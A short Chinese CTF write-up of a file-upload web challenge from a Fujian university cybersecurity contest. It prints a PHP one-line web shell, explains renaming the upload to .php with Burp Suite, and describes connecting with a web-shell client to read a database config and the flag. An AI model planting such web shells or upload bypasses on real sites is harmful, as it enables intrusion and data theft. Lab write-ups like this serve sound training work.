目录

i春秋-第三届百越杯福建省高校网络空间安全大赛

i春秋-第三届“百越杯”福建省高校网络空间安全大赛

i春秋-第三届“百越杯”福建省高校网络空间安全大赛

记录一下i春秋里的一道web题,题目类型是文件上传漏洞

传送门:https://www.ichunqiu.com/battalion?t=1&r=61025

主要就两个知识点,很基础,适合新手阅读,大佬勿喷哈

文件上传

来到上传点

https://i-blog.csdnimg.cn/blog_migrate/2a622ed0b9bce426310f7ff1a9df0dcc.png

先上传一个正常的.jpg 文件(图片中写入一句话木马)

<?php eval($_POST['a']) ;?>

https://i-blog.csdnimg.cn/blog_migrate/ac247f8efe43aba5b46bec2f03679fd8.png

然后打开 burp suite 抓包,把后缀名 jpg 修改成 php

https://i-blog.csdnimg.cn/blog_migrate/a1dd2e2e1e7bdd04611125a630b486cb.png https://i-blog.csdnimg.cn/blog_migrate/0d693659f1dd655e735e315873abbe5c.png

点击 Forward 发送数据包,成功上传并返回上传路径,当前目录下的 upload/hi.php

https://i-blog.csdnimg.cn/blog_migrate/42456e679c2db3512db1a4328c5e4aff.png

利用菜刀连接数据库

密码:a

类型:php

https://i-blog.csdnimg.cn/blog_migrate/5f20d2216bcf8bcea91e042727e50890.png

连上后并没发现 flag,但是在 html 文件夹里找到数据库配置文件

https://i-blog.csdnimg.cn/blog_migrate/262eb5d6a4af397590485fdd7dba4233.png https://i-blog.csdnimg.cn/blog_migrate/351c920b3431e78032ed7d48159ad511.png

https://i-blog.csdnimg.cn/blog_migrate/256acad0b71f2d2876cf69b2def1624a.png

然后再点击配置

https://i-blog.csdnimg.cn/blog_migrate/a9f7ebe51af18f487ea7a772dc7cef9f.png

填写刚才找到的数据库配置文件,格式为

<T>mysql</T> //数据库
<H>localhost</H> //数据库地址
<U>ctf</U> //账号
<P>ctfctfctf</P> //密码

https://i-blog.csdnimg.cn/blog_migrate/fc30fa68c393735b654a772ee795d553.png

连接成功,在 ctf 库中找到 flag

https://i-blog.csdnimg.cn/blog_migrate/5a97e711d1422a43108b8967fb53cad3.png